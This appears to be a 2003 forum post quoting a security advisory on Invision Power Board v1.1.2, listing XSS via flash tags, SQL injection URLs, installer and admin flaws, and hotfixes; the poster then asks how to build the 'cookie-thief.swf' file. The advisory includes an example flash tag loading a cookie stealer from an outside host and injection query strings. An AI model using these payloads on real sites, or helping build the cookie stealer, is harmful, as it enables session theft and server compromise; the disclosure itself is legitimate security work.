reking
Aug 17 2003, 06:26 PM
| QUOTE |
===========================================
Security REPORT Invision Power Board v1.1.2
===========================================
Product: Power Board v1.1.2 (maybe earlier Versions)
Vulnerablities: cross site scripting, sql-injection, install- and admin-issues, os-command execution
Vuln.-Classes: Check out http://www.owasp.org/asac/ for more detailed information on "Attack Components"
Vendor: http://www.invisionboard.com/
Vendor-Status: contacted "info@invisionpower.com" on Jul.11th 2003
Vendor-Patchs: http://www.invisionboard.com/downloads/chat.zip
Exploitable:
Local: ---
Remote: YES
============
Introduction
============
Visit "http://www.invisionboard.com/" for additional information.
=====================
Vulnerability Details
=====================
1) CROSS-SITE-SCRIPTING
=======================
OBJECT:
Post.php
DESCRIPTION:
by using [FLASH=h,w][/FLASH]-tags within a posting(Post-textarea) it is possible to execute
arbitrary client-scripts ... thus leading to cookie-theft.
the usage of flash tags is allowed per default in "conf_global.php":
---*---
$INFO['allow_flash'] = '1';
---*---
EXAMPLE-Content:
---*---
hey dude, whats up?
[flash=2,2]http://anotherhost.ext/cookie-thief.swf[/flash]
cu,
jonnie
---*---
2) SQL-INJECTION
================
OBJECT:
ipchat.php
DESCRIPTION:
depending on mysql-version and/or drivers it is possible to change the result of sql-queries.
EXAMPLE(mySql > 4):
---*---
http://localhost/ibo/ipchat.php?password=1...n%2527,1%252f*+
---*---
EXAMPLE(with file-permission set):
---*---
http://localhost/ibo/ipchat.php?password=1...o+outfile+%2527[fullpath]%2527--+
---*---
3) INSTALLER-, ADMIN-ISSUES
===========================
if for some reason(permissions, directory-moving) the installer-lockfile(install.lock) is missing, any user can use the "sm_install.php" - script.
once administrator .. one is able to:
A) execute arbitrary SQL-QUERIES thru "admin.php/act=mysql/code=runsql/query=sq"
 upload arbitrary files(including programms and scripts) into the "emoticons" directory.
.. thus leading to a "total" compromise of the http-servers account.
=======
Remarks
=======
---
====================
Recommended Hotfixes
====================
disallow flash in "conf_global.php".
check for installer-lockfile.
software patch(es).
EOF Martin Eiszner / @2003WebSec.org
=======
Contact
=======
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei@websec.org
http://www.websec.org
|
can anyone tell me how to create this cookie-thief.swf page (of course it doesnt have to be a flash file, can be anything as long as it works)?
i will of course not be using it here heh... i guess you're patched for that one anyway.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
